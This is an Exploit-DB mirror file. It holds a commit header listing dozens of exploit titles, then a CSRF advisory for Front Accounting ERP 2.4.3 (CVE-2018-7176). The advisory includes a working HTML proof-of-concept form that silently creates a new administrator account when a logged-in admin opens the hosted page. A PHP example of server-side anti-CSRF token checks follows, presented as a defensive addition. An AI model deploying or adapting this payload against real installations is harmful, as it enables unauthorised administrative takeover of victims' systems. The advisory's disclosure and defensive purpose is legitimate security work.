exploit-db-mirror/exploits/php/webapps/44137.html
Offensive Security ed38447971 DB: 2018-02-17
45 changes to exploits/shellcodes

Microsoft Edge - 'UnmapViewOfFile' ACG Bypass
JBoss Remoting 6.14.18 - Denial of Service
Siemens SIPROTEC 4 and SIPROTEC Compact EN100 Ethernet Module < 4.25 - Denial of Service

ABRT - raceabrt Privilege Escalation(Metasploit)

Joomla! Component Fastball 1.1.0 < 1.2 - SQL Injection
Joomla! Component Fastball 1.1.0 < 1.2 - 'league' SQL Injection

Dasan Networks GPON ONT WiFi Router H640X versions 12.02-01121 / 2.77p1-1124 / 3.03p2-1146 - Unauthenticated Remote Code Execution
Dasan Networks GPON ONT WiFi Router H640X 12.02-01121 / 2.77p1-1124 / 3.03p2-1146 - Unauthenticated Remote Code Execution
EPIC MyChart - SQL Injection
TV - Video Subscription - Authentication Bypass SQL Injection
UserSpice 4.3 - Blind SQL Injection
Twig < 2.4.4 - Server Side Template Injection
Joomla! Component Kubik-Rubik Simple Image Gallery Extended (SIGE) 3.2.3 - Cross-Site Scripting
Joomla! Component Advertisement Board 3.1.0 - 'catname' SQL Injection
Joomla! Component Aist 2.0 - 'id' SQL Injection
Joomla! Component AllVideos Reloaded 1.2.x - 'divid' SQL Injection
Joomla! Component DT Register 3.2.7 - 'id' SQL Injection
Joomla! Component Fastball 2.5 - 'season' SQL Injection
Joomla! Component File Download Tracker 3.0 - SQL Injection
Joomla! Component Form Maker 3.6.12 - SQL Injection
Joomla! Component Gallery WD 1.3.6 - SQL Injection
Joomla! Component Google Map Landkarten 4.2.3 - SQL Injection
Joomla! Component InviteX 3.0.5 - 'invite_type' SQL Injection
Joomla! Component JB Bus 2.3 - 'order_number' SQL Injection
Joomla! Component jGive 2.0.9 - SQL Injection
Joomla! Component JomEstate PRO 3.7 - 'id' SQL Injection
Joomla! Component JquickContact 1.3.2.2.1 - SQL Injection
Joomla! Component JS Autoz 1.0.9 - SQL Injection
Joomla! Component JS Jobs 1.1.9 - SQL Injection
Joomla! Component JTicketing 2.0.16 - SQL Injection
Joomla! Component MediaLibrary Free 4.0.12 - SQL Injection
Joomla! Component NeoRecruit 4.1 - SQL Injection
Joomla! Component Project Log 1.5.3 - 'search' SQL Injection
Joomla! Component Realpin 1.5.04 - SQL Injection
Joomla! Component SimpleCalendar 3.1.9 - SQL Injection
Joomla! Component Smart Shoutbox 3.0.0 - SQL Injection
Joomla! Component Solidres 2.5.1 - SQL Injection
Joomla! Component Staff Master 1.0 RC 1 - SQL Injection
Joomla! Component Timetable Responsive Schedule For Joomla 1.5 - 'alias' SQL Injection
Joomla! Pinterest Clone Social Pinboard 2.0 - SQL Injection
Joomla Component ccNewsletter 2.x.x 'id' - SQL Injection
Joomla! Component Saxum Astro 4.0.14 - SQL Injection
Joomla! Component Saxum Numerology 3.0.4 - SQL Injection
Joomla! Component SquadManagement 1.0.3 - SQL Injection
Joomla! Component Saxum Picker 3.2.10 - SQL Injection
Front Accounting ERP 2.4.3 - Cross-Site Request Forgery
PHIMS - Hospital Management Information System - 'Password' SQL Injection
PSNews Website 1.0.0 - 'Keywords' SQL Injection
Oracle Primavera P6 Enterprise Project Portfolio Management - HTTP Response Splitting
2018-02-17 05:01:49 +00:00


<!--
# Exploit Title: Front Accounting ERP 2.4.3 - CSRF
# Date: 16-02-2018
# Exploit Author: Samrat Das
# Contact: http://twitter.com/Samrat_Das93
# Website: https://securitywarrior9.blogspot.in/
# Vendor Homepage: frontaccounting.com
# Version: 2.4.3
# CVE : CVE-2018-7176
# Category: WebApp ERP
1. Description
The application is coded in a way that allows a maliciously crafted HTML
page to be executed directly, without any anti-CSRF countermeasures.
2. Proof of Concept
1. Visit the application.
2. Visit the User Permissions page.
3. Go to Add User and create a crafted CSRF exploit for that request. Once
it is hosted on a server and the link is sent to the victim, it gets
exploited when the victim clicks it.
Steps to Reproduce:
1. Create an HTML page with the exploit code below:
-->
<html>
<body>
<form action="http://localhost/frontaccounting/admin/users.php?JsHttpRequest=0-xml" method="POST" enctype="text/plain">
<input type="hidden" name="show&#95;inactive"
value="&user&#95;id&#61;Newadmin&password&#61;Newadmin&real&#95;name&#61;New&#37;20Admin&phone&#61;&email&#61;&role&#95;id&#61;8&language&#61;C&pos&#61;1&print&#95;profile&#61;&rep&#95;popup&#61;1&ADD&#95;ITEM&#61;Add&#37;20new&&#95;focus&#61;user&#95;id&&#95;modified&#61;0&&#95;confirmed&#61;&&#95;token&#61;Ta6aiT2xqlL2vg8u9aAvagxx&&#95;random&#61;757897&#46;6552143205"
/>
<input type="submit" value="Submit request" />
</form>
</body>
</html>
<!--
2. When a logged-in admin user clicks this hosted page, a new malicious
admin user is created.
3. PoCs and steps:
https://securitywarrior9.blogspot.in/2018/02/cross-site-request-forgery-front.html
4. Solution:
Implement anti-CSRF token code in state-changing HTTP requests and validate
it on the server side.
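
The server-side check described in the Solution, as an added example that is not part of the original advisory or of FrontAccounting's code: a per-session token is issued, embedded in forms, and compared in constant time on every state-changing request. The function names, the `_csrf` field name and the sample request fields are assumptions; `$session` stands in for `$_SESSION`.

```php
<?php
declare(strict_types=1);

// Added example: per-session anti-CSRF token, validated on the server.
// Not FrontAccounting code; every name below is hypothetical.

const CSRF_FIELD = '_csrf'; // assumed hidden form field name
const STATE_CHANGING = ['POST', 'PUT', 'PATCH', 'DELETE'];

/** Create the session's token once and return it for embedding in forms. */
function csrf_issue(array &$session): string
{
    if (empty($session['csrf'])) {
        $session['csrf'] = bin2hex(random_bytes(32)); // 256 bits from the CSPRNG
    }
    return $session['csrf'];
}

/** Return true only if the request is allowed to proceed. */
function csrf_check(array $session, string $method, array $fields): bool
{
    if (!in_array(strtoupper($method), STATE_CHANGING, true)) {
        return true; // safe methods must never change state
    }
    $expected = $session['csrf'] ?? '';
    $supplied = $fields[CSRF_FIELD] ?? '';
    if (!is_string($expected) || !is_string($supplied) || $expected === '') {
        return false; // no token issued, or token missing or malformed
    }
    return hash_equals($expected, $supplied); // constant-time comparison
}

// Constructed demo data: parsed request fields for three POSTs and one GET.
$session = [];
$token = csrf_issue($session);

$legit  = ['user_id' => 'alice', 'ADD_ITEM' => 'Add new', CSRF_FIELD => $token];
$forged = ['user_id' => 'Newadmin', 'ADD_ITEM' => 'Add new']; // cross-site form cannot read the token
$guess  = $forged + [CSRF_FIELD => str_repeat('0', 64)];      // static or guessed value

var_dump(csrf_check($session, 'POST', $legit));  // request from the application's own form
var_dump(csrf_check($session, 'POST', $forged)); // token absent
var_dump(csrf_check($session, 'POST', $guess));  // token present but not this session's
var_dump(csrf_check($session, 'GET', []));       // read-only request, no token required
```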
-->